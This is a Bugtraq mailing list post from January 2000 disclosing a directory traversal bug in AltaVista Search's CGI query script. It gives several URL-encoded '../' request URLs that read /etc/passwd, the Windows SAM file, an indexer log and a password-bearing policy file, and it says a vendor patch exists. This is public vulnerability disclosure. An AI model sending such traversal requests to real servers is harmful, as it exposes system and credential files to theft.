Bugtraq mailing list archives
Altavista followup
From: rudicarell () HOTMAIL COM (rudi carell)
Date: Sun, 9 Jan 2000 07:37:04 PST
hola, more bugs in the AV-Search thing .. using uri-encoded strings it is possible to view "any" file on the system .. examples: unixxxsss ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd or on an micro$oft IIS ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._ interesting infos about the file structure ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log or another file which does contain the password .. http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf altavista told me that this is(was) just a flavour of the "old" bug and its fix is(was) included in the last secpatch. whatever .... nicedays:-/ RC rudicarell () hotmail com ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
Current thread:
- [Hackerslab bug_paper] Solaris chkperm buffer overflow ±è¿ëÁØ KimYongJun (99Á¹¾÷) (Jan 05)
- Re: [Hackerslab bug_paper] Solaris chkperm buffer overflow Darren Reed (Jan 06)
- <Possible follow-ups>
- Re: [Hackerslab bug_paper] Solaris chkperm buffer overflow Brock Tellier (Jan 06)
- Re: [Hackerslab bug_paper] Solaris chkperm buffer overflow Theodor Ragnar Gislason (Jan 07)
- Altavista followup rudi carell (Jan 09)